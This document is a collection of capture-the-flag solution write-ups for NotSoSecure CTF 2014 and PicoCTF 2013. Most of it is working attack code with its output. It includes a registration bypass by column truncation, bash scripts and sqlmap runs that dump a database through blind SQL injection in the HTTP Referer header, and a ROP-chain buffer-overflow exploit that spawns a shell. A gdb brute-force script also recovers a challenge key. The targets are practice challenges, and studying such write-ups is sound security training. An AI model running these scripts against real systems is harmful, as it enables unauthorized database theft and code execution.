# NotSoSecure CTF April 2k14


Flag 1 - Column truncation

# cat get_register_page
#!/bin/bash
# Fetch the CTF landing page and decode the hint hidden in its last HTML
# comment: the third '-'-separated field of that line is base64 of a gzip
# stream, and the decoded text names the registration page.

url='http://ctf.notsosecure.com/9128938921839838/'

# Last "<!--" line of the page, third '-'-delimited field, spaces stripped.
comment=$(curl --silent --location --request GET "$url" \
  | grep -e '<!--' \
  | tail -n 1 \
  | awk -F '-' '{print $3}' \
  | tr -d ' ')

printf '%s\n' "$comment"
# base64 -> gzip -> plaintext; the trailing echo terminates the line.
base64 -d <<<"$comment" | gunzip
echo

# ./get_register_page 
H4sIAAAAAAAAAAsyTs80LTEu0ssoyc0BACMzGYUNAAAA
R3gi5t3r.html

# cat get_flag_1
#!/bin/bash
# Register an account with the caller-supplied name/e-mail/password, then log
# in as "admin" with that same password and print the flag/feedback lines.
# (The example run pads the name with spaces — the "column truncation" the
# section heading refers to.)
#   $1 - registration name (spaces are sent as %20)
#   $2 - registration e-mail
#   $3 - password used for both the registration and the admin login

regname=$(echo -n "$1" | sed 's/ /%20/g')
regemail="$2"
regpass="$3"
url='http://ctf.notsosecure.com/9128938921839838'
cookie="nss"

register_url="$url/register.php?regname=$regname&regemail=$regemail&regpass1=$regpass&regpass2=$regpass"
checklogin_url="$url/checklogin.php"

curl --silent --request GET "$register_url" \
  | grep -e 'successfully' -e 'Already'

# Same file as cookie jar and cookie source so the login session is kept.
curl --silent --location --request POST \
  --cookie-jar "$cookie" --cookie "$cookie" \
  --data "myusername=admin&mypassword=$regpass" \
  "$checklogin_url" \
  | grep -e 'Flag' -e 'feedback'

# ./get_flag_1 'admin               nss' 'fake@mail.com' 's3cur3'
              <h3 style="text-align: center;font-size: 30px;">You have registered successfully</h3>
       <h4 style="text-align: center;">Well done, 1st Flag is 67326289</h4>
      <center><a href="f33db4ck_flag/index.php" class="btn">feedback</a></center>

Flag 2 - Blind SQLi in HTTP Referer

# cat get_flag_2
#!/bin/bash
# Driver for flag 2: record the baseline response, then enumerate the tables,
# the columns of the flag table and finally the flag values through the
# sibling scripts. Each step is labelled on stdout.

# Print a "=== label ===" banner, then run the remaining arguments.
phase() {
  printf '=== %s ===\n' "$1"
  shift
  "$@"
}

./feedback_base
phase "Dump tables" ./dump_tables
phase "Dump columns from flag table" ./dump_columns flag
phase "Dump flags from flag column" ./dump_flags flag flag

# cat feedback_base
#!/bin/bash
# Submit one plain feedback form and save the response as the file "normal";
# ./feedback diffs every later probe response against it.

ofile="normal"
url='ctf.notsosecure.com/9128938921839838'
feedback_url="$url/f33db4ck_flag/submit.php"

name="name"
email="email"
message="message"
form="name=$name&email=$email&message=$message&submit=Submit"

curl --silent --request POST --data "$form" "$feedback_url" > "$ofile"

# cat dump_tables
#!/bin/bash
# Enumerate table names of the non-system schemas through ./feedback, whose
# output contains "Error" when the SQL condition it is handed is false.
# Three yes/no oracles: count the tables, then each name's length, then each
# character (lowercase letters and digits only; a position with no match is
# left blank).

# Run one condition through ./feedback; succeed when no "Error" came back.
holds() {
  [[ -z "$(./feedback "$1" | grep Error)" ]]
}

# Columns of every table outside the system schemas.
from_user_tables="from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql'"

# Count the tables by incrementing until the equality holds.
t=0
until holds "(select count(distinct table_name) $from_user_tables)=$t"; do
  t=$((t + 1))
done

echo "#tables = $t"

for ((i = 0; i < t; i++)); do
  printf 'table[%d] = ' "$i"
  # Length of the i-th table name.
  j=1
  until holds "(select length(table_name) $from_user_tables group by table_name limit $i,1)=$j"; do
    j=$((j + 1))
  done
  # One position at a time; the first matching candidate wins.
  for ((k = 1; k <= j; k++)); do
    for l in {a..z} {0..9}; do
      if holds "(select substring(table_name,$k,1) $from_user_tables group by table_name limit $i,1)='$l'"; then
        printf '%s' "$l"
        break
      fi
    done
  done
  echo
done

# cat dump_columns 
#!/bin/bash
# Enumerate the column names of one table through ./feedback, whose output
# contains "Error" when the SQL condition it is handed is false. Three yes/no
# oracles: count the columns, then each name's length, then each character
# (lowercase letters and digits only; a position with no match is left blank).
#   $1 - table name

table="$1"

# Run one condition through ./feedback; succeed when no "Error" came back.
holds() {
  [[ -z "$(./feedback "$1" | grep Error)" ]]
}

# Columns of the requested table.
from_table_cols="from information_schema.columns where table_name='$table'"

# Count the columns by incrementing until the equality holds.
c=0
until holds "(select count(distinct column_name) $from_table_cols)=$c"; do
  c=$((c + 1))
done

echo "table = $table"
echo "#columns = $c"

for ((i = 0; i < c; i++)); do
  printf 'column[%d] = ' "$i"
  # Length of the i-th column name.
  j=1
  until holds "(select length(column_name) $from_table_cols limit $i,1)=$j"; do
    j=$((j + 1))
  done
  # One position at a time; the first matching candidate wins.
  for ((k = 1; k <= j; k++)); do
    for l in {a..z} {0..9}; do
      if holds "(select substring(column_name,$k,1) $from_table_cols limit $i,1)='$l'"; then
        printf '%s' "$l"
        break
      fi
    done
  done
  echo
done

# cat dump_flags 
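#!/bin/bash
# Enumerate the values of one column through ./feedback, whose output
# contains "Error" when the SQL condition it is handed is false. Three yes/no
# oracles: count the distinct values, then each value's length, then each
# character (lowercase letters and digits only; a position with no match is
# left blank).
#   $1 - table name   (interpolated verbatim into the query)
#   $2 - column name  (interpolated verbatim into the query)
# Fix: the "column = " line printed $table instead of $column; the sample run
# did not show it because both were "flag".

table="$1"
column="$2"

# Run one condition through ./feedback; succeed when no "Error" came back.
holds() {
  [[ -z "$(./feedback "$1" | grep Error)" ]]
}

# Count the distinct values by incrementing until the equality holds.
f=0
until holds "(select count(distinct $column) from $table)=$f"; do
  f=$((f + 1))
done

echo "table = $table"
echo "column = $column"
echo "#flags = $f"

for ((i = 0; i < f; i++)); do
  printf 'flag[%d] = ' "$i"
  # Length of the i-th value.
  j=1
  until holds "(select length($column) from $table limit $i,1)=$j"; do
    j=$((j + 1))
  done
  # One position at a time; the first matching candidate wins.
  for ((k = 1; k <= j; k++)); do
    for l in {a..z} {0..9}; do
      if holds "(select substring($column,$k,1) from $table limit $i,1)='$l'"; then
        printf '%s' "$l"
        break
      fi
    done
  done
  echo
done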

# cat feedback
#!/bin/bash

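# Report how the latest probe response differs from the baseline: print the
# "Thanks" line if the response has one, diff it against "normal" (written by
# feedback_base), then delete the response file. Reads the global ofile.
# Fix: expansions are quoted and filenames preceded by "--", so a response
# file name with spaces or a leading "-" cannot be split or read as an option.
function compare {
  grep Thanks -- "$ofile"
  diff -- normal "$ofile"
  rm -- "$ofile"
}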

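# Percent-encode every byte of $1 as %xx (lowercase hex) with no trailing
# newline. printf instead of echo so a value such as "-n" is encoded rather
# than swallowed as an echo option; od instead of xxd because od is POSIX and
# present everywhere (xxd ships with vim).
#   $1 - string to encode; result on stdout
function encode {
  printf '%s' "$1" | od -An -tx1 -v | tr -d ' \n' | sed 's/../%&/g'
}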

# Probe one SQL condition through the Referer header (sent percent-encoded)
# and let compare report whether the response differs from the baseline that
# feedback_base captured.
#   $1 - SQL boolean expression to test
condition="$1"
ofile="$RANDOM"
url='ctf.notsosecure.com/9128938921839838'
feedback_url="$url/f33db4ck_flag/submit.php"

# A true condition selects '1'; a false one selects a two-row subquery, which
# presumably fails and so changes the page relative to "normal".
injection="'+(select if($condition,'1',(select table_name from information_schema.columns limit 1,2)))+'"
referer=$(encode "$injection")

name="name"
email="email"
message="message"
form="name=$name&email=$email&message=$message&submit=Submit"

#--proxy 127.0.0.1:8080
curl --silent --referer "$referer" --request POST --data "$form" "$feedback_url" > "$ofile"
compare

# ./get_flag_2
=== Dump tables ===
#tables = 2
table[0] = flag
table[1] = temp
=== Dump columns from flag table ===
table = flag
#columns = 1
column[0] = flag
=== Dump flags from flag column ===
table = flag
column = flag
#flags = 1
flag[0] = 1362390

Flag 2 - Blind SQLi in HTTP Referer (sqlmap)

# cat do_sqlmap 
#!/bin/bash

# Run sqlmap against the feedback endpoint with the fixed setup (boolean-based
# blind, Referer header as the injection point) plus any extra options given
# as one space-separated string in $1. The option string is echoed first so
# every phase is labelled in the output.
function sqlm {
  local args="$1"
  local url='http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php'
  local referer='%27||(select(1)regexp(IF(1=1*,1,%27%27)))||%27'
  local string='Thanks!, we will be in touch...'
  local -a fixed=(
    --url="$url"
    --referer="$referer"
    --string="$string"
    --technique=B
    --threads=4
    --answers='it?=Y,any)?=y'
  )
  printf '%s\n' "$args"
  # shellcheck disable=SC2086 -- $args is meant to split into several options
  sqlmap "${fixed[@]}" $args
}

# Print a banner and run one sqlmap phase with the given option string.
phase() {
  printf '=== %s ===\n' "$1"
  sqlm "$2"
}

phase "Fingerprint" ""
phase "Enumerate DBMS databases" "--dbms=MySQL --dbs"
phase "Enumerate DBMS database tables" "--dbms=MySQL -D seven --tables"
phase "Enumerate DBMS database table columns" "--dbms=MySQL -D seven -T flag --columns"
phase "Dump DBMS database table entries" "--dbms=MySQL -D seven -T flag -C flag --dump"

# ./do_sqlmap
=== Fingerprint ===

sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Place: (custom) HEADER
Parameter: Referer #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: '||(select(1)regexp(IF(1=1 AND 4549=4549,1,'')))||'
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0

=== Enumerate DBMS databases ===
--dbms=MySQL --dbs

available databases [2]:
[*] information_schema
[*] seven

=== Enumerate DBMS database tables ===
--dbms=MySQL -D seven --tables

Database: seven
[2 tables]
+------+
| flag |
| temp |
+------+

=== Enumerate DBMS database table columns ===
--dbms=MySQL -D seven -T flag --columns

Database: seven
Table: flag
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| flag   | varchar(20) |
+--------+-------------+

=== Dump DBMS database table entries ===
--dbms=MySQL -D seven -T flag -C flag --dump

Database: seven
Table: flag
[1 entry]
+---------+
| flag    |
+---------+
| 1362390 |
+---------+

# PicoCTF 2k13 - Overflow 5


$ gdb buffer_overflow_shellcode_hard
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x080483c0 <+0>: push   ebp
   0x080483c1 <+1>: mov    ebp,esp
   0x080483c3 <+3>: and    esp,0xfffffff0
   0x080483c6 <+6>: sub    esp,0x10
   0x080483c9 <+9>: cmp    DWORD PTR [ebp+0x8],0x2
   0x080483cd <+13>: je     0x80483e2 <main+34>
   0x080483cf <+15>: mov    DWORD PTR [esp],0x80485c0
   0x080483d6 <+22>: call   0x8048390 <puts@plt>
   0x080483db <+27>: mov    eax,0x1
   0x080483e0 <+32>: leave  
   0x080483e1 <+33>: ret    
   0x080483e2 <+34>: call   0x8048370 <geteuid@plt>
   0x080483e7 <+39>: mov    DWORD PTR [esp+0x8],eax
   0x080483eb <+43>: mov    DWORD PTR [esp+0x4],eax
   0x080483ef <+47>: mov    DWORD PTR [esp],eax
   0x080483f2 <+50>: call   0x8048360 <setresuid@plt>
   0x080483f7 <+55>: mov    eax,DWORD PTR [ebp+0xc]
   0x080483fa <+58>: mov    eax,DWORD PTR [eax+0x4]
   0x080483fd <+61>: mov    DWORD PTR [esp],eax
   0x08048400 <+64>: call   0x80484c0 <vuln>
   0x08048405 <+69>: xor    eax,eax
   0x08048407 <+71>: leave  
   0x08048408 <+72>: ret    
End of assembler dump.
(gdb) disassemble vuln
Dump of assembler code for function vuln:
   0x080484c0 <+0>: sub    esp,0x41c
   0x080484c6 <+6>: mov    eax,DWORD PTR [esp+0x420]
   0x080484cd <+13>: mov    DWORD PTR [esp+0x4],eax
   0x080484d1 <+17>: lea    eax,[esp+0x10]
   0x080484d5 <+21>: mov    DWORD PTR [esp],eax
   0x080484d8 <+24>: call   0x8048380 <strcpy@plt>
   0x080484dd <+29>: add    esp,0x41c
   0x080484e3 <+35>: ret    
End of assembler dump.
(gdb) break main
(gdb) run
(gdb) info proc mappings 
process 21137
Mapped address spaces:

 Start Addr   End Addr       Size     Offset objfile
  0x8048000  0x8049000     0x1000        0x0 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
  0x8049000  0x804a000     0x1000        0x0 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
  0x804a000  0x804b000     0x1000     0x1000 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
 0xf7e28000 0xf7e29000     0x1000        0x0 
 0xf7e29000 0xf7fca000   0x1a1000        0x0 /lib32/libc-2.15.so
 0xf7fca000 0xf7fcc000     0x2000   0x1a1000 /lib32/libc-2.15.so
 0xf7fcc000 0xf7fcd000     0x1000   0x1a3000 /lib32/libc-2.15.so
 0xf7fcd000 0xf7fd1000     0x4000        0x0 
 0xf7fda000 0xf7fdb000     0x1000        0x0 
 0xf7fdb000 0xf7fdc000     0x1000        0x0 [vdso]
 0xf7fdc000 0xf7ffc000    0x20000        0x0 /lib32/ld-2.15.so
 0xf7ffc000 0xf7ffd000     0x1000    0x1f000 /lib32/ld-2.15.so
 0xf7ffd000 0xf7ffe000     0x1000    0x20000 /lib32/ld-2.15.so
 0xfffdd000 0xffffe000    0x21000        0x0 [stack]
$ ./ROPgadget /lib32/libc-2.15.so /bin/dash 2>&1 | grep -A 1000 python | sed -e "s/p = ''/p = '\\\x90'*1036/" -e 's/off = 0x0/off = 0xf7e29000/' > ~/rop.py
# cat ~/rop.py 
#!/usr/bin/python
# execve generated by Ropgadget v4.0.4
#
# Reviewer notes (see the gdb session above this script):
#  - The 1036 NOP bytes fill vuln()'s buffer: the frame is 0x41c bytes and
#    the buffer starts at esp+0x10, so the saved return address sits
#    0x41c - 0x10 = 0x40c = 1036 bytes into the copied argument.
#  - off is the libc load address read from `info proc mappings`; every
#    gadget offset below is relative to it, so the chain only holds while
#    that mapping is unchanged (presumably no ASLR on the challenge host).
#  - The chain writes "/bin/dash" followed by a NUL into libc's .data,
#    points ebx at the string and ecx/edx at the NUL, counts eax up to 11
#    and issues int 0x80.
from struct import pack

p = '\x90'*1036
# Padding goes here

# This ROP Exploit has been generated for a shared object.
# The addresses of the gadgets will need to be adjusted.
# Set this variable to the offset of the shared library
off = 0xf7e29000

p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee0) # @ .data
p += "AAAA" # padding
p += pack("<I", off + 0x00023f78) # pop eax ; ret
p += "/bin" # /bin
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee4) # @ .data + 4
p += "AAAA" # padding
p += pack("<I", off + 0x00023f78) # pop eax ; ret
p += "/das" # /das
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee8) # @ .data + 8
p += "AAAA" # padding
p += pack("<I", off + 0x00023f78) # pop eax ; ret
p += "hAAA" # hAAA
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee9) # @ .data + 9
p += "AAAA" # padding
p += pack("<I", off + 0x00032e30) # xor eax,eax ; ret
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret  (NUL terminator over the "AAA")
p += pack("<I", off + 0x000192ee) # pop ebx ; ret
p += pack("<I", off + 0x001a3ee0) # @ .data
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee9) # @ .data + 9
p += "AAAA" # padding
p += pack("<I", off + 0x00001a9e) # pop edx ; ret
p += pack("<I", off + 0x001a3ee9) # @ .data + 9
p += pack("<I", off + 0x00032e30) # xor eax,eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret  (eax == 11 after the xor and eleven incs)
p += pack("<I", off + 0x0002e2f5) # int 0x80
print p
$ ./buffer_overflow_shellcode_hard `python ~/rop.py`
$ cat key
most_impressive_young_padawan

# PicoCTF 2k13 - Mildly Evil


$ objdump -M intel -d mildly_evil 

mildly_evil:     file format elf32-i386

Disassembly of section .text:

080480b8 <_start>:
 80480b8: bd 2c 91 04 08        mov    ebp,0x804912c
 80480bd: 89 ec                 mov    esp,ebp
 80480bf: eb 00                 jmp    80480c1 <go>

080480c1 <go>:
 80480c1: 39 e5                 cmp    ebp,esp
 80480c3: 7f 59                 jg     804811e <exit>
 80480c5: 58                    pop    eax
 80480c6: 5b                    pop    ebx
 80480c7: 59                    pop    ecx
 80480c8: 85 c0                 test   eax,eax
 80480ca: 7c 2f                 jl     80480fb <gc>
 80480cc: 85 db                 test   ebx,ebx
 80480ce: 7c 14                 jl     80480e4 <pc>
 80480d0: 8d 44 85 00           lea    eax,[ebp+eax*4+0x0]
 80480d4: 8b 00                 mov    eax,DWORD PTR [eax]
 80480d6: 8d 5c 9d 00           lea    ebx,[ebp+ebx*4+0x0]
 80480da: 29 03                 sub    DWORD PTR [ebx],eax
 80480dc: 7f e3                 jg     80480c1 <go>
 80480de: 8d 64 8d 00           lea    esp,[ebp+ecx*4+0x0]
 80480e2: eb dd                 jmp    80480c1 <go>

080480e4 <pc>:
 80480e4: 8d 4c 85 00           lea    ecx,[ebp+eax*4+0x0]
 80480e8: ba 01 00 00 00        mov    edx,0x1
 80480ed: bb 01 00 00 00        mov    ebx,0x1
 80480f2: b8 04 00 00 00        mov    eax,0x4
 80480f7: cd 80                 int    0x80
 80480f9: eb c6                 jmp    80480c1 <go>

080480fb <gc>:
 80480fb: 8d 74 9d 00           lea    esi,[ebp+ebx*4+0x0]
 80480ff: b9 28 91 04 08        mov    ecx,0x8049128
 8048104: ba 01 00 00 00        mov    edx,0x1
 8048109: 31 db                 xor    ebx,ebx
 804810b: b8 03 00 00 00        mov    eax,0x3
 8048110: cd 80                 int    0x80
 8048112: b8 28 91 04 08        mov    eax,0x8049128
 8048117: 0f b6 00              movzx  eax,BYTE PTR [eax]
 804811a: 01 06                 add    DWORD PTR [esi],eax
 804811c: eb a3                 jmp    80480c1 <go>

0804811e <exit>:
 804811e: b8 01 00 00 00        mov    eax,0x1
 8048123: 31 db                 xor    ebx,ebx
 8048125: cd 80                 int    0x80

$ cat bruteforce.sh 
#!/bin/bash
# Recover the key expected by ./mildly_evil one character at a time, using
# the number of times a gdb breakpoint on `go` is hit as the signal: each
# candidate character is appended to the key so far, the binary is run under
# gdb on that input, and the hit count from `info breakpoints` is compared
# across candidates. A run whose output lacks "Wrong" ends the search.

alphabet=(- {0..9} {A..Z} _ {a..z})
key=''

# gdb driver: break on go, never stop there (large ignore count), feed the
# key file on stdin, then report the hit count and quit.
cat > gdb.script <<'eof'
break go
ignore 1 999999
run < key
info breakpoints
quit
eof

while :; do
  min_hits=999999
  seeded=0
  for ch in "${alphabet[@]}"; do
    printf '%s' "$ch"
    printf '%s\n' "$key$ch" > key
    output=$(gdb -q ./mildly_evil < gdb.script 2>&1)
    wrong=$(grep 'Wrong' <<<"$output")
    # "breakpoint already hit N times" -> N
    hits=$(grep 'already hit' <<<"$output" | awk '{print $4}')
    if [ -z "$wrong" ]; then
      echo
      rm -f gdb.script key
      exit
    fi
    if [ "$hits" -lt "$min_hits" ]; then
      min_hits=$hits
      # The first candidate only seeds min_hits; the next one that undercuts
      # it is taken as the next key character.
      if [ "$seeded" -eq 1 ]; then
        key=$key$ch
        break
      fi
      seeded=1
    fi
    printf '\b'
  done
done
$ ./bruteforce.sh
1337RE_m4ster
$ cat bruteforce.py 
import re
import gdb
import sys

def ge(command):
    """Run one gdb CLI command non-interactively and return its output as a string.

    Positional arguments to gdb.execute are (command, from_tty, to_string).
    """
    captured = gdb.execute(command, False, True)
    return captured

# Candidate characters: '-', digits, uppercase letters, '_', lowercase
# letters (the same set bruteforce.sh uses).
alphabet = []
alphabet.append(chr(45))
for i in xrange(48,58):
    alphabet.append(chr(i))
for i in xrange(65,91):
    alphabet.append(chr(i))
alphabet.append(chr(95))
for i in xrange(97,123):
    alphabet.append(chr(i))
key = ''
ofile = 'result.txt'  # program stdout for the current candidate

# Breakpoint 1 on `go`; its hit count is the signal the search keys on.
ge("set pagination off")
ge("set confirm off")
ge("file mildly_evil")
ge("break go")

# Outer loop extends the key by one character per pass; the inner loop tries
# every candidate and ends the script as soon as a run stops printing "Wrong".
while True:
    min_hits = 999999
    m = 0  # 0 until the first candidate has seeded min_hits
    for i in alphabet:
        sys.stdout.write(i)
        sys.stdout.flush()
        # The ignore count is used up as the breakpoint is hit, so it is
        # re-armed before every run; the breakpoint then only counts.
        ge("ignore 1 999999")
        gdb.execute("run <<< '" + key + i + "' > " + ofile, False, True)
        f = open(ofile, 'r')
        wrong = re.findall("Wrong", f.read())
        f.close()
        output = ge("info breakpoints")
        # "breakpoint already hit N times" -> N
        hits  = int(re.findall("hit ([0-9]+) times", output)[0])
        if wrong:
            # The first candidate only seeds min_hits; the next candidate that
            # undercuts it becomes the next key character.
            if hits < min_hits:
                min_hits = hits
                if m == 1:
                    key += i
                    break
                m = 1
        else:
            print
            sys.exit()
        sys.stdout.write('\b')
ge("quit")
$ gdb -q -n -x bruteforce.py
1337RE_m4ster